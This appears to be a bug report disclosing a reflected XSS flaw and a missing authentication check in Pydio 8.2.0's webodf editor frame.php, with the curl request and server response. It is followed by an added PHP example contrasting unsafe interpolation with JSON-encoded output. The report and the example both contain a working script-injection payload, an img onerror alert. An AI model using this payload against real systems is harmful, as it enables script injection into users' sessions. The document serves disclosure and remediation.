Open mbadici opened 6 years ago
Accessing:
curl -v "https://mypydio/plugins/editor.webodf/frame.php?file=1e8ali%3C/script%3E%3Cimg/src=%27x%27/onerror=alert(document.location)%3E"
output:
User-Agent: curl/7.49.1
Accept: */*
< HTTP/1.1 200 OK
< Date: Thu, 12 Jul 2018 15:04:55 GMT
< Server: Apache
< X-Frame-Options: SAMEORIGIN
< Strict-Transport-Security: max-age=15768000; includeSubdomains;
< Vary: Accept-Encoding
< Content-Length: 965
< Content-Type: text/html; charset=UTF-8
<
"); //window.odfcanvas.setEditable(true); /* odfcanvas.odfContainer().save(function(err){ console.log(err); }); */ } window.setTimeout(init, 0);

Since the access isn't authenticated, it should output just a redirect to the login page. My version is 8.2.0
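
The hardened form of the output pattern this report points at, as an added example that is not Pydio's code. It assumes frame.php writes the `file` query parameter into a JavaScript string inside an inline script block (the trailing `");` in the response body suggests this); `js_string_literal` and `load` are hypothetical names.

```php
<?php
// Added example, not Pydio code. Assumption: the "file" query parameter is
// written into a JavaScript string inside an inline <script> block.

/**
 * Encode an untrusted value as a JavaScript string literal that is safe to
 * place inside an inline <script> element. The JSON_HEX_* flags turn
 * < > & ' " into \uXXXX escapes, so the value can neither end the string
 * nor form a closing script tag that ends the script block.
 */
function js_string_literal(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $encoded = json_encode($value, $flags);
    if ($encoded === false) {
        // Invalid UTF-8 or similar: fail closed with an empty string literal.
        return '""';
    }
    return $encoded;
}

// Constructed input: the URL-decoded "file" value from the request above.
$file = "1e8ali</script><img/src='x'/onerror=alert(document.location)>";

// Assumed vulnerable pattern: raw interpolation. The value's own closing
// script tag ends the block early and the rest is parsed as HTML.
$unsafe = '<script>load("' . $file . '");</script>';

// Hardened pattern: the value stays data inside one string literal.
$safe = '<script>load(' . js_string_literal($file) . ');</script>';

// Count closing script tags in each rendering, then show the safe output.
echo 'unsafe closing tags: ', substr_count($unsafe, '</script>'), "\n";
echo 'safe closing tags:   ', substr_count($safe, '</script>'), "\n";
echo $safe, "\n";
```

Output encoding addresses only the reflection; the missing authentication check the report describes needs its own fix.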